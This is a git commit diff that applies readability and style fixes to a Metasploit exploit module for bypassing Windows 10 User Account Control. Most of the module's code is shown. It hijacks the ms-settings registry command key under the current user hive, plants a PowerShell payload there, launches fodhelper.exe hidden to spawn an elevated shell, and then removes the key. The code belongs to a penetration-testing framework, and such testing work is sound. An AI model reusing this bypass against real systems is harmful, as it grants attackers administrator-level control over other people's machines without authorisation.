Merge pull request #3 from bwatters-r7/land-8434

Rubocop readability changes
2024-11-05 14:57:30 +01:00 · 2017-06-06 22:09:53 +01:00 · 2017-06-06 22:09:53 +01:00 · e5e3be3046
commit e5e3be3046
parent 2fbbc98b5d f47cc1a101
1 changed files with 57 additions and 56 deletions
--- a/modules/exploits/windows/local/bypassuac_fodhelper.rb
+++ b/modules/exploits/windows/local/bypassuac_fodhelper.rb
@ -14,50 +14,53 @@ class MetasploitModule < Msf::Exploit::Local
  include Post::Windows::Registry
  include Post::Windows::Runas

-  FODHELPER_DEL_KEY    = "HKCU\\Software\\Classes\\ms-settings"
-  FODHELPER_WRITE_KEY  = "HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command"
-  EXEC_REG_DELEGATE_VAL = 'DelegateExecute'
-  EXEC_REG_VAL        = '' # This maps to "(Default)"
-  EXEC_REG_VAL_TYPE   = 'REG_SZ'
-  FODHELPER_PATH       = "%WINDIR%\\System32\\fodhelper.exe"
-  CMD_MAX_LEN         = 16383
+  FODHELPER_DEL_KEY     = "HKCU\\Software\\Classes\\ms-settings".freeze
+  FODHELPER_WRITE_KEY   = "HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command".freeze
+  EXEC_REG_DELEGATE_VAL = 'DelegateExecute'.freeze
+  EXEC_REG_VAL          = ''.freeze # This maps to "(Default)"
+  EXEC_REG_VAL_TYPE     = 'REG_SZ'.freeze
+  FODHELPER_PATH        = "%WINDIR%\\System32\\fodhelper.exe".freeze
+  CMD_MAX_LEN           = 16383

-  def initialize(info={})
-    super(update_info(info,
-      'Name'          => 'Windows UAC Protection Bypass (Via FodHelper Registry Key)',
-      'Description'   => %q{
-        This module will bypass Windows 10 UAC by hijacking a special key in the Registry under
-        the current user hive, and inserting a custom command that will get invoked when
-        the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC
-        flag turned off.
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'          => 'Windows UAC Protection Bypass (Via FodHelper Registry Key)',
+        'Description'   => %q{
+          This module will bypass Windows 10 UAC by hijacking a special key in the Registry under
+          the current user hive, and inserting a custom command that will get invoked when
+          the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC
+          flag turned off.

-        This module modifies a registry key, but cleans up the key once the payload has
-        been invoked.
+          This module modifies a registry key, but cleans up the key once the payload has
+          been invoked.

-        The module does not require the architecture of the payload to match the OS. If
-        specifying EXE::Custom your DLL should call ExitProcess() after starting your
-        payload in a separate process.
-      },
-      'License'       => MSF_LICENSE,
-      'Author'        => [
-          'winscriptingblog',    # UAC bypass discovery and research
-          'amaloteaux'  ,   # MSF module
+          The module does not require the architecture of the payload to match the OS. If
+          specifying EXE::Custom your DLL should call ExitProcess() after starting your
+          payload in a separate process.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [
+          'winscriptingblog', # UAC bypass discovery and research
+          'amaloteaux', # MSF module
        ],
-      'Platform'      => ['win'],
-      'SessionTypes'  => ['meterpreter'],
-      'Targets'       => [
+        'Platform'      => ['win'],
+        'SessionTypes'  => ['meterpreter'],
+        'Targets'       => [
          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
-      ],
-      'DefaultTarget' => 0,
-      'References'    => [
-        [
-          'URL', 'https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/',
-          'URL', 'https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1'
-        ]
-      ],
-      'DisclosureDate'=> 'May 12 2017'
-    ))
+        ],
+        'DefaultTarget' => 0,
+        'References'    => [
+          [
+            'URL', 'https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/',
+            'URL', 'https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1'
+          ]
+        ],
+        'DisclosureDate' => 'May 12 2017'
+      )
+    )
  end

  def check
@ -71,7 +74,7 @@ class MetasploitModule < Msf::Exploit::Local
  def exploit
    commspec = '%COMSPEC%'
    registry_view = REGISTRY_VIEW_NATIVE
-    psh_path  = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe"
+    psh_path = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe"

    # Make sure we have a sane payload configuration
    if sysinfo['Architecture'] == ARCH_X64
@ -95,7 +98,7 @@ class MetasploitModule < Msf::Exploit::Local
      end
    end

-    if !payload.arch.empty? && !(payload.arch.first == target_arch.first)
+    if !payload.arch.empty? && (payload.arch.first != target_arch.first)
      fail_with(Failure::BadConfig, 'payload and target should use the same architecture')
    end

@ -104,19 +107,18 @@ class MetasploitModule < Msf::Exploit::Local
    check_permissions!

    case get_uac_level
-      when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
-        UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
-        UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
-        fail_with(Failure::NotVulnerable,
-                  "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting..."
-        )
-      when UAC_DEFAULT
-        print_good('UAC is set to Default')
-        print_good('BypassUAC can bypass this setting, continuing...')
-      when UAC_NO_PROMPT
-        print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
-        shell_execute_exe
-        return
+    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
+      UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
+      UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
+      fail_with(Failure::NotVulnerable,
+                "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
+    when UAC_DEFAULT
+      print_good('UAC is set to Default')
+      print_good('BypassUAC can bypass this setting, continuing...')
+    when UAC_NO_PROMPT
+      print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
+      shell_execute_exe
+      return
    end

    payload_value = rand_text_alpha(8)
@ -145,7 +147,7 @@ class MetasploitModule < Msf::Exploit::Local
    end

    registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view)
-    registry_setvaldata(FODHELPER_WRITE_KEY, payload_value,psh_payload, EXEC_REG_VAL_TYPE, registry_view)
+    registry_setvaldata(FODHELPER_WRITE_KEY, payload_value, psh_payload, EXEC_REG_VAL_TYPE, registry_view)

    # Calling fodhelper.exe through cmd.exe allow us to launch it from either x86 or x64 session arch.
    cmd_path = expand_path(commspec)
@ -153,7 +155,7 @@ class MetasploitModule < Msf::Exploit::Local
    print_status("Executing payload: #{cmd_path} #{cmd_args}")

    # We can't use cmd_exec here because it blocks, waiting for a result.
-    client.sys.process.execute(cmd_path, cmd_args, {'Hidden' => true})
+    client.sys.process.execute(cmd_path, cmd_args, { 'Hidden' => true })

    # Wait a copule of seconds to give the payload a chance to fire before cleaning up
    # TODO: fix this up to use something smarter than a timeout?
@ -171,7 +173,6 @@ class MetasploitModule < Msf::Exploit::Local
      registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view)
    end
    registry_deleteval(FODHELPER_WRITE_KEY, payload_value, registry_view)
-
  end

  def check_permissions!